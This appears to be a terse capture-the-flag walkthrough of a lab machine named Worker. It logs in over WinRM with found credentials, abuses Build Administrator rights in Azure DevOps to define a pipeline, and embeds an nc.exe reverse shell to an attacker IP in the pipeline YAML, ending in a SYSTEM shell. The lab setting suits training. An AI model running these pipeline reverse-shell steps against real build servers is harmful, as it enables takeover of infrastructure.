11 evil-winrim robisl :5985
$ evil-winrm -i 10.10.10.203 -u robisl -p wolves11
Evil-WinRM shell v3.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\robisl\Documents> whoami
worker\robisl
# can't find anything new as we've enumerated on box
# using creds on devops.worker.htb
http://devops.worker.htb/ekenas/
new repo: PartsUnlimited
# look at (bottom left) Project Settings > Security >
# robisl is a member of Build Administator, can define builds using CI pipeline
# exploit using Pipeline
Pipelines > New >
(select where is project hosted): Azure Repo Git
(select repo): PartsUnlimited
(type of pipeline): Starter Pipeline
file: modified.yaml
# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml
trigger:
- master
pool: 'Default'
steps:
- script: whoami
displayName: 'Run a one-line script'
# trigger defines when will it run, usually on commits (and merges); but saving will run it too
# pool defines how pipeline will run
# steps defines scripts to run
ERROR:The pipeline is not valid. Could not find a pool with name Default. The pool does not exist or has not been authorized for use.
# to find agent-pools
(top-left) Azure DevOps > (bottom-left) Collection Settings > Agent Pools
there is a pool called "Setup"
# modifying and changing to multi line scripts
# try2.yaml
trigger:
- master
pool: 'Setup'
steps:
- script: |
whoami /priv
C:\Windows\System32\cmd.exe /c C:\Users\Public\nc.exe -e cmd.exe 10.10.16.7 7070
displayName: 'kashz'
$ nc -lvnp 7070
listening on [any] 7070 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.203] 51927
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.
W:\agents\agent11\_work\9\s>whoami
nt authority\system
Last updated